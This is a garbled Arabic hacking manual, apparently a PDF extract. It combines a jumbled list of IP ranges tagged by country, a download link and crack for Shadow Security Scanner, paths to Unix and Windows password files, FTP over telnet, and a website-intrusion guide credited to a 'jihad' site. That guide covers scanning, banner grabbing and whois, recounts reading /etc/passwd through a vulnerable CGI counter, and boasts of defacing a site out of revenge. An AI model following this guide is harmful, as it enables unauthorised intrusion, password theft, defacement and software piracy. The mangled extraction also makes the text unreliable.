<----------212.236.114.113.255<------------212.198.49.208.255<------------206.ayna.92.1‬أسرائيل‬ ‫‪<--------212.43.130.255---------------139.26.1‬السعوديه‬ ‫‪ <-----------212.‫وصلة البرنامج‪.88.255<-----------212.170.70.25.170.255.1.72.58.72.255----------------213.1.70.1‬أسرائيل‬ ‫‪<--------192.255--------------212.1.1‬أسرائيل‬ ‫‪<---------128.145.1‬قطر‬ ‫‪ <-----------206.3.238.255---------------199.128.8.188.2.1‬أسرائيل‬ ‫‪<--------209.255<------------194.188.229.20.109.0.1‬عمان‬ ‫‪ <----------193.204.0.187.102.255<-------------195.58.236.13.1‬السعوديه‬ ‫‪ <-----------213.229.190.1.50.187.226.128.7.139.255----------------128.42.229.109.39.255<-------------212.102.133.255<-------------209.30.255---------------212.40.1‬أسرائيل‬ ‫‪<---------216.226.224.1‬السعوديه‬ ‫‪ <------------212.143.0.43.208.150.133.106.238.114.1‬الكويت‬ ‫‪<-----------195..72.7.42.72.120..1‬قطر‬ ‫‪ <-----------206.7.1‬قطر‬ ‫‪ <------------209.106.

exe‬‬ ‫وبعد مايكتمل التحميل حمل الكراك من هنا‬ ‫‪http://www.safety-lab.com/SSS.‫انتهى‪،،،‬‬ ‫" شرح برنامج ‪ Shadow Scan Security‬لتحليل الموقع "‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة ةةةةةة<‬ ‫نبذة بسيطة عن البرنامج‪:‬‬ ‫هذا البرنامج هو أكثر البرامج فعالية في اكتشاف الثغرات وأيضا المنافذ المفتوحة ف المواقع ولديه أعمال‬ ‫كثيرة لكني لن أتطرق إل لعملية واحدة فقط وهي شرح كيفية اكتشاف الثغرات في المواقع ومعرفة النطاقات‬ ‫المستخدمة لهذا الموقع وبالنسبة للخيارات الباقية لن أشرحها لنها سوف تأخذ وقت طويل لكني سوف أقسم‬ ‫شرحي لهذا البرنامج لقسام عدة وسوف أبدئها بالعظم وهو شرح لكيفية إخراج ثغرات الموقع والمنافذ‬ ‫الخاصة به والمواقع المسجل بها والمزيد من الوظائف‬ ‫أول تنزيل البرنامج وتنصيب الكراك ‪Shadow Scan Security‬‬ ‫مافيه أبسط منه‬ ‫حمل البرنامج من هذي الوصلة‬ ‫‪http://www.35.exe‬‬ ‫الطريقة‪:‬‬ ‫========================================‬ ‫بعد تحميل البرنامج وتنزيله وعمل ‪ SetUp‬له‬ ‫افتح الكراك‬ ‫وبعد ذلك ستظهر هذه الصورة‪:‬‬ ‫‪184‬‬ .net/almodammer/ShadowSecurityScanner5.e3sar.

‫‪+++++++++++‬‬ ‫ٍ[]‪ ][1‬اضغط ليتم تنفيذ الكراك‬ ‫[]‪ ][2‬بعد إتمام عملية الكراك اضغط هنا للخروج‬ ‫========================================‬ ‫*****& شـــ البرنامج ـــرح &*****‬ ‫سوف أشرح باختصار ومن يصعب عليه الفهم أرجو أن يتقدم لي بالسؤال‬ ‫=)بعد تحميل البرنامج قم بفتحه من قائمة‬ ‫ابدأ ‪Start‬‬ ‫وابحث عنه ضمن البرامج‬ ‫بعد إيجاد البرنامج قم بفتح‬ ‫‪ShadowScanSecurity‬‬ ‫ليـأتي لك هذا(=‬ ‫الشكل ‪-1-‬‬ ‫أثناء الضغط على ‪Scanner‬‬ ‫الشكل‪-2-‬‬ ‫‪185‬‬ .

‫‪ =1‬إضافة سياسة جديدة والمقصود بها أيقونة أخرى وهي الرقم ‪ 4‬ولكن تحمل اسمك )ولداعي لن تنشأ‬ ‫باحث أو سياسة جديدة لك يكفيك الموجودة(‬ ‫‪ =2‬إعدادات لهذا الباحث وأيضا انا لأنصحك بتغيير شيء أبدا في هذا الخيار‬ ‫‪ =3‬حذف الموجه الجديد التي انت صممته والمقصود اليقونة التي تشبه رقم ‪ 4‬ولكن من تصميمك فبضغطك‬ ‫هنا سوف تحذفها‬ ‫‪ =4‬عليك تظليله وهو المربع الذي يوجد به خصائص البحث عن كل شيء‬ ‫‪ =5‬لرجوع للخلف ولأظن أن هناك رجوع لنها العملية والطار الول‬ ‫‪ =6‬اضغطها إذا أردت المتابعة‬ ‫‪ =7‬إزالة الطار‬ ‫الشكل‪-3-‬‬ ‫‪186‬‬ .

‫)‪ (1‬للرجوع إلى الشكل ‪-2-‬‬ ‫)‪ (2‬الذهاب إلى العملية التالية‬ ‫)‪ (3‬إلغاء إكمال العملية‬ ‫الشكل‪-4-‬‬ ‫‪ +1+‬إضافة موقع للبحث فيه‬ ‫‪ +2+‬إضافة أي بي من وإلى‬ ‫‪ + 3+‬تحميل من ملف سواء كان يحتوي على مواقع تريد البحث عنها او آي بيات‬ ‫‪ +4+‬عند إضافة موقع وبعد تحديده أثناء الضغط هنا سوف ينحذف‬ ‫‪ + 5+‬العودة والرجوع إلى الخلف أي‪ :‬الشكل‪-3-‬‬ ‫‪ + 6+‬إتمام العملية‬ ‫‪ + 7+‬إزالة والخروج من الطار إلى واجه البرنامج الرئيسية كباقي الزرار السابقة في الشكال السابقة‬ ‫الشكل‪-5-‬‬ ‫أثناء ضغط الزر ‪ Done‬وفي الخطوة السابقة سوف يظهر هذا المربع الكبير‬ ‫ومن هنا سوف نبدأ البحث عن الثغرات أنظر الشكل لتفصيل أكثر‬ ‫‪187‬‬ .

‫الشكل‪-6-‬‬ ‫بعد الضغط على ‪ Start Scan‬وذلك بتظليل الموقع والضغظ بزر الفأرة اليمين‬ ‫انتظر قليل بعد ضغطك لرقم ‪ 1‬في الشكل‪-5-‬‬ ‫وسوف يقوم البرنامج بالبحث في الموقع والمنافذ الخاصة به مع النطاقات كما هو موضح في هذا الشكل‬ ‫انتهى‪،،،‬‬ ‫" اماكن وجود ملف الباسورد في أنظمة التشغيل "‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪ :‬ةةةة ةةةة<‬ ‫في نطم ليونكس‬ ‫‪etc/shadow/‬‬ ‫‪188‬‬ .

winnt/repair/sam or sam/‬‬ ‫في الويندوز اكس بي البروفيشينال واصدارات الويسلر )) سيرفر ‪ -‬ادفانسد سيرفر ((‬ ‫لن تجد الويندوز في مجلد ‪WINNT‬‬ ‫ولكن سيكون كالويندوز العادي ‪.XP .Windows‬‬ ‫انتهى‪،،،‬‬ ‫" اختراق الموقع )الجزء الول( "‬ ‫>ةةةةة ةة ةةةة ةةةةةة ةةةةةةةةةة<‬ ‫‪189‬‬ .passwd/‬‬ ‫في نظم السيليكون جرافيكس ‪ SGI‬المسمى ‪ARIX‬‬ ‫‪etc/shadow/‬‬ ‫نظام اي بي ام المسمى ‪AIX‬‬ ‫‪etc/security/shadow/‬‬ ‫نظم يونكس بصفه عامه ))اتش بي يو اكس ‪ )) -‬ترو يونكس ‪ )) 64‬خاص بالمنفريم ونظم الريسك ‪64‬‬ ‫وبعض منتجات اللفا (( (( ((‬ ‫‪etc/shadow/‬‬ ‫))اغلب هذه الصدارات تعتمد تشفير ‪ MD5‬القوي ((‬ ‫نظم ويندوز بصفه عامه )) ‪(( NT .‫في نظم صن ميكروسيستيمز‬ ‫‪etc/shadow/‬‬ ‫في نظم ال ‪ BSD‬بصفه عامه‬ ‫‪etc/master.2000‬‬ ‫)) الملف المفعل بتشفير ‪(( LanMan‬‬ ‫‪winnt/system32/config/sam/‬‬ ‫))هذا الملف مغلق عادة ال عند القلع من النظام ول يسمح بفتحه او نسخه طالما النظام يعمل حتى ولو كان‬ ‫لديك صلحيات الدمنيستريتور ((‬ ‫))الملف الحتياطي ((‬ ‫‪_.

.Sources Code‬شفرة‬ ‫‪190‬‬ .‬إذن فلبد لك من استخدام الفرنسية )البروتوكول المستخدم( حتى تتحدث )الرسال والستقبال( بحريه ‪.‬كما انه لبد لنا من أن نعرف أيضا أنه لبد من‬ ‫برنامج ‪ Daemon‬يتسمع على المنفذ المراد التصال عليه ‪... Password‬بما أن‬ ‫‪ zdnet‬تدعم المستخدم ‪ Anonymous‬سيتم استخدامه في الولوج للنظام كالتالي‪:‬‬ ‫ستكتب‬ ‫‪ .‬فلبد لك من استخدام وسيله اتصال )‪ (Telnet‬و لنفرض أنها الهاتف الذي‬ ‫لبد للرجل أن يضعه على أذنه )‪ (Daemon‬لكي يسمعك ‪ .Sources Code‬شفرة‬ ‫‪..‬و لنفرض أيضا أن هذا الرجل ل يتحدث العربية‬ ‫‪ .com‬بالمنفذ ‪21‬‬ ‫و هذا ما سيظهر لك‬ ‫‪ .‬و لكن ها قد حان الوقت لمجابهة الصعوبة و التشعب و تقديم و لو حتى‬ ‫فكرة بسيطة عن هذا الموضوع الممتع ‪.‬‬ ‫مما سبق نستنتج أن ‪ Telnet‬هو مجرد وصله )مثل الهاتف( ‪ .‬‬ ‫سأعيد تعريف ‪ Telnet‬من جديد و لكن بطريقه اكثر بساطه ‪..l19-sj-zdnet.‬‬ ‫تشبيه من حياتنا العملية ‪ :‬نفترض أن هناك رجل في فرنسا )المستهدف( و أنت )المتصل( تريد إقامة حوار‬ ‫معه )وصله( و أنت في مصر ‪ .‬‬ ‫بدء التصال‬ ‫‪ -1‬قم بتشغيل ‪ Telnet‬و شبك على ‪ ftp.com NcFTPd Server (licensed copy) ready 220‬‬ ‫و السطر السابق يسمي ‪ Banner‬الخاص بال ‪ FTP Daemon‬المستخدم في موقع ‪ zdnet‬و هي‬ ‫تختلف باختلف الموقع الذي سيتم التشبيك عليه ‪ . 21‬‬ ‫أين الصعوبة إذن ؟‬ ‫الصعوبة تكمن في أننا لكي نستخدم ‪ Telnet‬ك ‪ FTP Client‬يجب علينا اللمام بقدر كبير ببروتوكول‬ ‫‪!! FTP‬‬ ‫و لكن هذا لن يمنعني من عرض بعض المثلة لظهار كيفية التعامل مع هذا البروتوكول ‪.‫مقدمه ‪:‬‬ ‫مرت فترة طويلة منذ الدرس السابق ول اعرف لماذا مر كل هذا الوقت دون أن ابدأ في كتابة هذا الدرس ‪.zdnet....‬‬ ‫ربما لصعوبة الموضوع و تشعبه ‪ .‬‬ ‫استخدام ‪ Telnet‬ك ‪FTP Client‬‬ ‫المنفذ الذي سيتم التصال عليه في حاله استخدامنا بروتوكول نقل الملفات ‪FileTransfer Protocol‬‬ ‫في الغالب سيكون ‪.‬و انه لبد لنا من معرفة البروتوكول‬ ‫المستخدم في التصال حتى ننجح في الرسال و الستقبال ‪ .‬‬ ‫‪ Telnet‬هو برنامج يستخدم في إنشاء وصله بين جهازين ‪،‬و الجهاز المتصل يستخدم عنوان الجهاز‬ ‫المستهدف و رقم المنفذ ‪ Port‬الذي سيتم التصال عليه ‪،‬و الجهاز المستهدف )الخادم( يشغل برنامج آخر )‬ ‫‪ (Daemon‬يستمع على هذا المنفذ و تتم عمليه الرسال والستقبال باستخدام أحد البروتوكولت ‪..‬‬ ‫‪ -2‬الخطوة التالية هي الولوج باستخدام اسم المستخدم ‪ Username‬و كلمة السر ‪ ..zdnet.‬و الرقم الموجود في البداية يدل على نجاح التصال و هو‬ ‫رقم ثابت ‪..

Guest login ok.‬و إذا لم ترد إعطاء بريدك فيمكنك أن تكتب أي شئ يأخذ شكل البريد )أي يحتوي على الرمز) @‬ ‫و سيستجيب الخادم بالتالي‬ ‫‪ .‬‬ ‫و لكي ننشئ تلك الوصلة ‪،‬هناك طريقتين‬ ‫الولي ‪ :‬تنشئ هذه الطريقة الوصلة بان يرسل الزبون )أنت( رقم ‪ IP‬الخاص به و المنفذ المفتوح الذي‬ ‫يستطيع الخادم استخدامه في إرسال البيانات ‪..‬‬ ‫و لذلك لن نستخدم تلك الطريقة ‪.‬‬ ‫أنت الن قد قمت بالولوج إلى الخادم بنجاح ‪.Sources Code‬شفرة‬ ‫‪.Logged in anonymously 230‬‬ ‫و بالطبع تلك الستجابه قد تختلف من موقع لخر ‪ .Sources Code‬شفرة‬ ‫‪.‬‬ ‫و لكن تلك الطريقة تتطلب منك فتح أحد المنافذ على جهازك و هذا سيتطلب برنامج خاص لفتح هذا المنفذ ‪..‬‬ ‫بعد أن تمت عمليه الولوج للنظام يجب إنشاء وصله لرسال واستقبال البيانات )قائمه بالملفات الموجودة أو‬ ‫الملفات ذاتها( ‪ .‫‪user anonymous‬‬ ‫و سيستجيب الخادم بالتالي‬ ‫‪ . send your complete e-mail address as password 331‬‬ ‫ثم تكتب أنت التالي‬ ‫‪ ..‬‬ ‫الثانية ‪ :‬تنشئ هذه الطريقة الوصلة بان يرسل الزبون المر ‪PASV‬‬ ‫‪191‬‬ .You are user #552 of 2000 simultaneous users allowed-230‬‬ ‫‪-230‬‬ ‫‪.‬إل في الرقم في بداية كل سطر ‪.Sources Code‬شفرة‬ ‫‪pass @zorro‬‬ ‫و بالطبع عند الولوج بالمستخدم ‪ Anonymous‬تقوم بإعطاء عنوان البريد اللكتروني الخاص بك ككلمة‬ ‫السر ‪ ...‬إذن ما الذي كنا نفعله منذ قليل ؟!! ما قد فعلناه منذ قليل هو إنشاء وصله لرسال الوامر‬ ‫للنظام و استقبال استجابة النظام على الوامر ‪.

12..Data connection already open. 3113‬‬ ‫إذن عندما تريد أن ترسل أحد الوامر سترسله من النافذة الولى و النافذة الثانية ستظهر بها البيانات ‪..‬‬ ‫مثال‬ ‫عندما ترسل المر ‪( LIST‬يستخدم لعرض محتويات الدليل( في النافذة الولى‬ ‫‪ .Sources Code‬شفرة‬ ‫‪. 207.‬‬ ‫مثال‬ ‫‪ ..zdnet.com‬بالمنفذ‬ ‫‪..61‬‬ ‫أما الرقمان التاليان فيمثلن رقم المنفذ و يتم حسابه كالتالي‬ ‫‪3113 = 41 + 256 × 12‬‬ ‫و لذلك فالخطوة التالية التي يجب على الزبون اتباعها هي فتح وصله جديده مع الخادم على المنفذ ‪.Sources Code‬شفرة‬ ‫‪(Entering Passive Mode (207..189.Sources Code‬شفرة‬ ‫‪PASV‬‬ ‫و سيرد الخادم برقم ‪ IP‬الخاص به و المنفذ المفتوح )على الخادم بالطبع( الذي يستطيع الزبون )أنت(‬ ‫التصال عليه ‪.69.‬‬ ‫أول أربع مجموعات )من اليسار( هو ال ‪ IP‬الخاص بالخادم و في هذه الحالة يكون ‪. Transfer starting 125‬‬ ‫‪192‬‬ .‫‪ .189.69. 3113‬‬ ‫ولكي تقوم بمثل هذا المر يتوجب عليك فتح نافذة ‪ Telnet‬جديده و تشبك على ‪ ftp.41 227‬‬ ‫و الرقم الطويل الموجود بين القواس تفسيره كالتالي ‪..61.Sources Code‬شفرة‬ ‫‪LIST‬‬ ‫سيستجيب الخادم بالتالي في النافذة الولى أيضا‬ ‫‪ .

.‬‬ ‫انتهى‪،،،‬‬ ‫" اختراق المواقع )الجزء الثاني( "‬ ‫> منقول من موقع الجهاد<‬ ‫>الكاتب‪ :‬الكندور<‬ ‫‪193‬‬ .asp‬‬ ‫)ينصح به بشده(‬ ‫‪) http://www.htm‬ينصح به بشده(‬ ‫‪) http://www.‬‬ ‫إلى هنا و أظن أنني قد تماديت ‪ .‫و ستظهر محتويات الدليل في النافذة الثانية ثم سيتم غلق التصال في النافذة الثانية بمجرد إتمام عرض‬ ‫محتويات الدليل ‪.cis. PASV‬ثم تنشئ اتصال جديدا بعد حساب رقم المنفذ باتباع الخطوات السابقة ‪.vbip.html‬لمن اراد التعمق في‬ ‫البروتوكول(‪.ohio-state...‬‬ ‫و هكذا كلما أردت أن ترسل أمر عرض محتويات دليل ما أو استقبال أو إرسال ملف ما ‪ ،‬يجب أن تبدأ بأمر‬ ‫‪ .com/winsock/winsock_ftp_01.com/winsock/winsock_ftp_ref_01.‬و لكنني لم استطع أن امنع نفسي من مشاركتكم بهذا الموضوع الممتع‬ ‫)ممتع بالنسبة إلي( ‪.edu/htbin/rfc/rfc0959.vbip.‬أل أستطيع بدل من كل هذا الهراء أن استخدم برنامج جاهز مثل ‪ CuteFTP‬؟!!‬‫بالطبع تستطيع و لكن لن يضرك أن تعلم شيئا عن البروتوكول الذي تستخدمه و ربما بعد تعلم البروتوكول‬ ‫تستطيع أن تصنع برنامجك الخاص‬ ‫ اقرأ الدرس مره و مرتين حتى تستوعب الفكرة تماما ثم اسأل فيما شئت‬‫ لتعلم اكثر عن هذا الموضوع قم بزيارة المواقع التالية‬‫‪http://www.‬‬ ‫ملحظات هامة‬ ‫ لربما تتساءل الن ‪ .

com‬‬ ‫‪194‬‬ .25 .‫الختراق ‪:‬‬ ‫~~~~~~~~~‬ ‫ المقدمة ‪..513 .110 .7lem.7lem.143 .23 .‬‬‫ كيف أجمع معلومات حول الموقع ؟‬‫ كيف يتم كشف نقاط الضعف ؟‬‫ كيف يمكن إستغلل نقاط الضعف المكتشفه ؟‬‫ ماهو ملف كلمة المرور ‪ password file‬؟‬‫ بماذا يفيدني هذا الملف ؟‬‫ كيف يمكن معرفة كلمة السر من خلل ملف الباسورد ‪ password file‬؟‬‫ ماالفرق بين إذا كان الملف )مشفر ‪ (encryption‬وإذا كان )مضلل ‪ (shadowed‬؟‬‫ وماذا لو كان ملف كلمة المرور مشفر ‪ ،‬كيف يتم كسره ؟‬‫‪ -‬ولو كان ملف كلمة المرور مضلل ‪ ،‬ماذا علي ان أعمل ؟‬ ‫المقدمة ‪-:‬‬ ‫~~~~~~~~~‬ ‫أعد هذا المستند للباحثين وليس لمن أراد أن يخترق موقع فقط ! أنا أعتبر أن لديك الخبره اللزمه لفهم كل ما‬ ‫أتحدث عنه ‪ ،‬ل تتوقع إني بقول لك نزل برنامج ) مثل ‪ ( Void Eye‬أو غيره وحط لك في هذا المستند‬ ‫شرح بالصور وقول لك إخترق مواقع ‪ ،‬العمل المقزز هذا لن نتطرق له أبدًا‬ ‫ كيف أجمع معلومات حول موقع ؟‬‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬ ‫أول خطوه تصلحها هي بورت سكان ‪ ،‬أنصحك تستخدم ‪ nmap‬المشهوره والقواء على الطلق‪،‬يمكن أن‬ ‫تبحث عنها هذا إذا ما لقيتها في الموقع ‪ www.org/nmap‬وهي تعمل على نظام ليونكس ‪،‬‬ ‫إذا أردت برنامج يعمل على ويندوز انصحك بـ ‪ ، SuperScan‬عليك البحث عنها في النترنت ‪ ،‬سوف تجد‬ ‫آلف المواقع التي تقدمها لتنزيل ‪ ،‬ومن الممكن أن تستخدم نصوص ‪ Perl‬لعمليه البحث ‪ ،‬لغه ‪Perl‬‬ ‫أصبحت اللغه محبوبه لدى جميع الهاكر بعد ‪C‬‬ ‫بعد الحصول على النتائج ‪ ،‬مثل نصلح تجربه على الموقع ‪ ( /http://www.com‬بعض برامج‬ ‫البحث تطلب وضع رقم الي بي للموقع ‪ ،‬ولتقبل الدوماين عندها إستخدم ‪ ping‬لتعرف رقم الي بي(‬ ‫تأتي النتائج ‪ ،‬البورتات )‪ (587 .37 ..22 .21‬ويوجد منافذ‬ ‫أخرى لكن لن نهتم لها هنا ‪ ،‬نقوم بعمليه نزع التواقيع للمنافذ‪.‬‬ ‫ماهي عمليه نزع التواقيع للمنافذ؟‬ ‫من المعروف أن المنفذ فتح من قبل تطبيق ‪ ،‬عند التصال بهذا المنفذ فسوف يتم إرجاع رد اليك ‪ ،‬مثل لو‬ ‫إتصلت بالبورت ‪ 23‬وهو لتلنت ‪ ،‬وموقع ‪ /http://www.inscure.514 .com‬توجد به خدمه تلنت ‪ ،‬ويتضح هذا‬ ‫من عمليه مسح المنافذ ‪،‬التصال بخدمه اتلنت‬ ‫‪/telnet http://www.7lem.

7lem..com‬‬ ‫كل ماعليك بعد تثبيت الداة في جهازك هو كتابه ‪ queso‬وثم مسافه والموقع ورقم البورت ‪ 80‬والذي هو‬ ‫بطبيعه الحال مفتوح في جميع المواقع‪...7‬‬ ‫لو أردت مثل قائمة بالبريدات الموجوده في موقع ‪ /http://www..com‬‬ ‫وأنتظر النتائج‬ ‫ملحظه ‪ -:‬إذا كنت تعيش مع بن لدن ولست عائش في جو تقنيه معلومات كل ما عليك فعله هو تفجيراليميل‬ ‫)على حسب ما يسمياها كثير من الناس(‬ ‫ملحظه ثانيه ‪ -:‬إذا لم تجد في السيرفر خدمه تلنت أو أنه تم تغيير التوقيع عن طريق مثل قرصنه‬ ‫النظام ‪.‬‬ ‫‪.‬الخ ‪ ،‬عليك أن تستخدم ‪ queso‬الداة المفضله لكشف نظام التشغيل ‪ ،‬وهي تعمل على ليونكس ‪،‬‬ ‫لستخدامها عليك كتابه‬ ‫‪/queso http://www.com/ 80‬‬ ‫‪---------------------‬‬‫‪.7elm.‫يتم تنفيذ المر التالي في ‪ Windows‬و ‪ Linux‬و ‪ SunOS‬و ‪ FreeBSD‬و ‪ QNX‬بنفس الصيغه ‪،‬‬ ‫ولكن أفضل ‪ Linux‬عنها ‪ ،‬وهو لن لينكس يوفر كل ماتحتاجه من أدوات ‪.‬‬ ‫‪---------------------‬‬‫أختصرت النتيجه وتم تضليل إصدار ملقم الويب وذلك لحمايه الموقع ‪ ،‬اتمنى أن تستطيع كشفه بنفسك‪.7‬‬ ‫‪---------------------.condor.‬يأتيك الرد بأن النظام ‪SunOS 5.* Server‬‬ ‫‪.‬‬ ‫‪... info‬الخ ( أو أدرت معرفه الـ ‪ DNS‬الولي والثانوي للموقع ‪ ،‬أو من هو الشخص‬ ‫اللي سجل ومعلومات عنه وما هي الشركه التي تستظيف الموقع ‪ ،‬عليك بإستخدام خدمه ‪ ، whois‬تستطيع‬ ‫إستخدام خدمه ‪ whois‬وتطلب معلومات من قواعد بيانات ‪ whois‬عن طريق أمر ‪ whois‬في لينكس ‪،‬‬ ‫أكتب ‪ man whois‬لمزيد من المعلومات ‪ ،‬إذا كنت تستخدم ويندوز أو أي بيئه أخرى أنصحك بالتوجه الى‬ ‫برمجيات السي جي آي المتواجد في الموقع‬ ‫‪195‬‬ ..com‬مثل ) ‪ support‬أو‬ ‫‪ webmaster‬أو ‪.‬‬ ‫‪Apache/1.‬‬ ‫من المعروف من عمليه السكان بورت بأن البورتين ‪ 110‬و ‪ 25‬مفتوحين ‪ ،‬هذا يدل على أن في الموقع‬ ‫خدمة البريد اللكتروني ‪ ،‬بالطبع هذا يفيدك لمعرفه ‪ smtp‬و ‪ pop‬للموقع ‪ ،‬كل ماعليك فعله هو كتابه المر‬ ‫التالي )في ‪( Linux‬‬ ‫‪host 7lem.3..7‬بقي عليك أن تنتزع التواقيع من البورتات المتبقيه‬ ‫لتعرف ما هو التطبيق وإصدارته المنصت لها )إستخدم التلنت ( ‪ ،‬وثم تقوم ببحث عن نقاط ضعف لها‬ ‫وتحصل على شيفرات الستثمار الخاصه بها ‪ ،‬الخطوه التاليه هي أن تعرف ما هو ملقم الويب الذي يعمل‬ ‫على هذا النظام ‪ ،‬نذهب الى الترمينال تبع ليونكس ونكتب‬ ‫‪nc http://www...login :‬‬ ‫يتضح بأن السيرفر يعمل على نظام ‪، SunOS 5.‬‬ ‫‪.‬هذا المستند ل يختص بـ‬ ‫‪ Linux‬لذلك لن أذكرها ‪ ،‬تأتي نتيجه التصال بسيرفر الحلم على بورت التلنت‬ ‫‪---------------------‬‬‫‪SunOS 5..

.passwd‬لتشغل بالك الن بما تعنيه كلمة مضلله ومافائده هذا الملف ‪.‬أو كان برنامج تنفيدي أو حتى نظام التشغيل أو ملقم الويب مصاب بنقطه‬ ‫ضعف من الممكن أن يعرض السيرفر للختراق ويعرض كل ما بداخله من أسرار الى المخترق ‪ ،‬سأختار لكم‬ ‫حادثه مره معي‬ ‫‪ ،‬عداد زورا‬ ‫‪ counter‬عرض موقع‬ ‫‪ mp3‬مشهور للختراق في أي لحظه ‪ ،‬أول مادخلت الموقع ونزلت أغنيه ‪ Don't Tell Me‬في الوقت‬ ‫اللي كانت الغنيه تنزل فيه حبيت أشوف الموقع وأضيع وقت الى أن ينتهي التحميل ‪ ،‬ما كنت أتوقع أني‬ ‫بلقي نقاط ضعف فيه ‪ ،‬فتحت التلنت‬ ‫وشبكت على كم بورت معروف مثل ‪ 25‬و ‪ 23‬و ‪ 21‬و ‪ 110‬الخ ‪ ،‬دخلت منتدى في الموقع واخذت إسم‬ ‫المنتدى ‪ Ikonboard v2.com/search?q=whois&btnG=Google+Search‬‬ ‫ كيف يتم كشف نقاط الضعف ؟‬‫~~~~~~~~~~~~~~~~~~~~~~~~~~‬ ‫ل تستخدم برامج مثل ‪ void eye‬أو ‪ ShadowSecurityScaner‬هذه للمغفلين فقط!!‪ ،‬المحترفين‬ ‫واللي يبغا يكون محترف ل يستخدم برامج في عمليات الختراق ‪ ،‬ول يخترق لمجرد أنه يبغا يخترق ‪ ،‬عمليه‬ ‫إختراق سيرفر تمتاز بالدقه المتناهيه ‪ ،‬والتخطيط المحكم ‪ ،‬وكل عمليات السطو المحكمه هي التي يصعب‬ ‫إكتشاف مرتكبيها ‪ ،‬لكن وال لو كنت من اللي يشغل برنامج ومايدري ال وين حاطه فصدقني إنك ماراح تفلح‬ ‫طول عمرك ‪ ،‬هذا لو قدرت تخترق شئ ‪ ،‬فلو حدث وتم الختراق بواحد من هذه البرامج فسوف تصطاد‬ ‫بسناره تماما كالسمكه‬ ‫نقاط الضعف المفضله والتي تعتبر كأسرار ول يكشف عنها ال بعد فتره طويله هي التي في ملقم الويب مثل‬ ‫‪ Apache‬أو ‪ ، IIS‬وكذلك نقاط الضعف الموجوده في سكربتات ‪ CGI‬و ‪ Perl‬و ‪ ، PHP‬أو التي قد‬ ‫تكون موجوده في البرنامج المستخدم لتفسير نصوص البيرل أو السي جي آي ‪ ،‬وإذا كان في الموقع برنامج‬ ‫لتسوق مثل من الممكن أن تستغل فيه نقطه ضعف هذا إذا وجدت به ‪ ،‬يعني اي شئ في السيرفر سوى كان‬ ‫سكربت بيرل أو سي جي آي‪...7b‬تركنا المنتدى ورحنا‬ ‫ندور على شئ ثاني ‪ ،‬فتحت السورس تبع الصفحه وبحثت عن ‪ cgi‬و ‪ ، pl‬وجدنا سكريبت ثاني ‪ ،‬علبة‬ ‫توصيت ‪ ،‬نبحث عن نقاط ضعف لها ‪ ،‬ل شئ تماما ‪ ،‬نكمل البحث عن السكريبتات ‪ ،‬وأخيرا وعندما وصل‬ ‫التحميل للغنيه عند ‪ % 80‬كنت قد توصلت لنقطه ضعف في سكريبت ‪ cgi‬خاص لعداد الزوار ‪ ،‬تمكنك من‬ ‫عرض أي ملف في السيرفر ‪ ،‬طلبت الملف ‪ etc/passwd‬وطبعا كلمة المرور المسجله في المف كانت‬ ‫مضلله والنظام كان هو ‪ FreeBSD‬يعني كلمة المرور تكون في نفس الدليل ولكن في ملف ثاني وهوالملف‬ ‫‪ shadow‬أو ‪ ، master.‬إستمر في القراءة فقط‬ ‫‪++++++++++++++++++++++++‬‬ ‫الجزء الثاني‬ ‫} ‪ { http://www.html‬‬ ‫توفر لك هذه الصفحه مجموعه من برمجيات السي جي آي التي تسهل لك المهمه ‪ ،‬هناك رياضيات لطلب‬ ‫معلومات عن موقع ويب بإستخدام ‪ whois‬وهي مفيده جدا ‪ ،‬على كل حال توجه الى الموقع التالي لمزيد‬ ‫من التفاصيل‬ ‫‪http://www.fbunet.‬كل‬ ‫هذا ستعرفه قريبا ‪.cgi‬هذا ‪ ، CGI‬ل‬ ‫تستغرب ‪ ،‬هذه هي الحركات الجديده لنشر ال نكمل الموضوع ‪.8b‬توجهة الى كم موقع وبحثت فيها بسرعه عن نقاط ضعف المنتدى ‪ ،‬ولكن‬ ‫كانت نقاط الضعف لـ ‪ Ikonboard v2.1.8b‬وليس ‪ ، Ikonboard v2...1.‬‬ ‫‪196‬‬ .psyon.org/tools/index.‫‪http://www.1.de/cgibin/nph-%20%20%20%20%20..google..

/.com‬هذا موقع يستحق التدمير ‪ ،‬وقد تم ذلك ‪ ،‬وهو الن تم إرجاعه ولكن‬ ‫من جديد ول يحوي ال القليل من الصفحات ل تتجاوز إثنتان‬ ‫سمعت عن هذا الموقع في أحد منتديات الهاكرز النجليزيه بأنه يقدم خدمه ل أعلم ما هي بالضبط ‪ ،‬فذهبت‬ ‫للموقع لسجل واعرف ماهي ‪ ،‬كان التسجيل عن طريق إرسال معلومات الى بريد اللكتروني ارسلت‬ ‫معلومات ‪ ،‬وصلني الرد بعد ساعتين تقريبا ‪ ،‬كا كنت أن الرد يكون كله حش وسب ‪ ،‬ما كنت أقراء ال كلم‬ ‫كله حش وسب ‪ ،‬ليش ‪ ،‬تبين لي السبب هو ذكري كلمة ‪ ، i'm from saudi arabia‬ولكن لماذا كل هذا‬ ‫الحقد ‪ ،‬ومضت ايام وكل يوم والثاني أحقد عليه أكثر وأكثر عشان عنصريته ‪ ،‬ال أن توفقنا ولقينا لملقم‬ ‫الويب حقه نقطه ضعف في موقعي روسي ‪ ،‬وال الن غير مرقوعه ‪ ،‬تقدر تعرض كل الملفات الموجوده في‬ ‫السيرفر ‪ ،‬وتقدر تسحب منها كل ماتريد ‪ ،‬عن طريق اليو آر إل هذا‬ ‫عنوان الموقع وثم ‪ /.../.Cgi‬الموجوده في الموقع ‪ ،‬هذا إذا وجد شئ منها‬ ‫‪ -4‬ولتنسى تحط البورتات معها ‪ ،‬لنه أحيانا يكون في البورت نقطه ضعف ‪ ،‬ليس هذا صحيحا ‪%100‬‬ ‫نقطه الضعف ليست في البورت بعينه ‪ ،‬في البرنامج اللي مصلح إنصات للبورت )هذا أقرب تعبير لها(‬ ‫‪ -5‬أخيرا يمكنك الستفاده من المعلومات التي حصلت عليها في البحث عن نقاط ضعف )يوجد في آخر هذا‬ ‫المستند مواقع من ظمنها مواقع تحتوي على أرشيفات قد تفيدك في الحصول على الثغرات(‬ ‫ كيف يمكن إستغلل نقاط الضعف المكتشفه ؟‬‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬ ‫أبسط الثغرات والتي يستطيع أي مبتدي أن يستخدمها هي تلك التي تنفذ من خلل المتصفح ‪ ،‬مثل المثال‬ 